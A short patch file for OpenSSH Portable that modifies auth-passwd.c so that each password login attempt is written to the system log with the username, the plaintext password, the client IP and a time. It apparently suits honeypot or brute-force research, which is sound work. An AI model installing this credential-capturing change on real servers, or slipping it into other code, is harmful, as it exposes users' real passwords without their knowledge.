Patch for OpenSSH Portable to log usernames, passwords and IPs
Written by Brad Tilley <btilley@gatech.edu>

Tested on:

    OpenSSH 5.3p1 - OpenSSH 7.5p1
    May apply to older versions.

To apply:

    patch --dry-run < sshlog.patch
    patch < sshlog.patch

--- auth-passwd.c	2017-03-19 22:39:27.000000000 -0400
+++ auth-passwd-btilley.c	2017-04-11 13:44:27.797006213 -0400
@@ -85,6 +85,21 @@
 {
 	struct passwd * pw = authctxt->pw;
 	int result, ok = authctxt->valid;
+
+	struct ssh *ssh = active_state;
+
+        if(authctxt->user && password && ssh) {
+		logit("sshlog: %.100s %s %.200s %lu", 
+			authctxt->user, 
+			password, 
+			ssh_remote_ipaddr(ssh),
+			(unsigned long)time(NULL));
+	}
+
+        else {
+		logit("sshlog: unable to log attempt");
+	}
+
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
 	static int expire_checked = 0;
 #endif
